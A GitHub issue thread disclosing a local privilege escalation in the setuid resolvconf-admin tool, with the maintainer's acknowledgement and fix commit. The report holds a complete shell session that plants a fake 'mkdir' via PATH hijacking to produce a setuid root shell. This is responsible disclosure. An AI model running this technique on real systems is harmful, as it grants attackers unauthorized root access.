### ISSUE TITLE
local privilege escalation vulnerability

### ISSUE THREAD

**Issue by zx2c4** [dkg/resolvconf-admin#5]
Not all providers of `/sbin/resolvconf` set `PATH` themselves. Always clear all environment variables before exec'ing in an suid executable.

```
unpriv@scw-968260:~$ id
uid=1000(unpriv) gid=1000(unpriv) groups=1000(unpriv),114(resolvconf-admins)

unpriv@scw-968260:~$ stat /usr/bin/resolvconf-admin 
  File: /usr/bin/resolvconf-admin
  Size: 24736           Blocks: 56         IO Block: 4096   regular file
Device: fd00h/64768d    Inode: 2897743     Links: 1
Access: (4754/-rwsr-xr--)  Uid: (    0/    root)   Gid: (  114/resolvconf-admins)
Access: 2017-10-29 21:56:25.709185001 +0000
Modify: 2017-10-29 21:55:04.529185001 +0000
Change: 2017-10-29 21:55:41.449185001 +0000
 Birth: -

unpriv@scw-968260:~$ echo 'main() { setuid(0); setgid(0); execl("/bin/sh", 0); }' > a.c && gcc -o rootshell a.c

unpriv@scw-968260:~$ echo "main() { chown(\"$PWD/rootshell\", 0, 0); chmod(\"$PWD/rootshell\", 04755); }" > a.c && gcc -o mkdir a.c

unpriv@scw-968260:~$ export PATH="$PWD:$PATH"

unpriv@scw-968260:~$ resolvconf-admin add eth0 8.8.8.8
Cannot write to /run/resolvconf/lock

unpriv@scw-968260:~$ ./rootshell 
# id
uid=0(root) gid=0(root) groups=0(root),114(resolvconf-admins),1000(unpriv)
```

**Comment by dkg** [comment]
Thanks for this report!  version 0.3 should fix this vulnerability.

sigh, setuid programs :/

I welcome patches to README.md which suggest other ways to avoid installing this package while still running a network-management daemon as a non-privilieged user, including filesystem permissions and ACLs.  I'm not sure how to provide that guidance in the face of arbitrary resolvconf plugins, but the more we can document and standardize sane approaches, the sooner we'll be able to make this sort of hackery obsolete.

**Comment by dkg** [comment]
64ae25da06d2898b019876fc38d8f4af2649f829 specifically should resolve this concern.
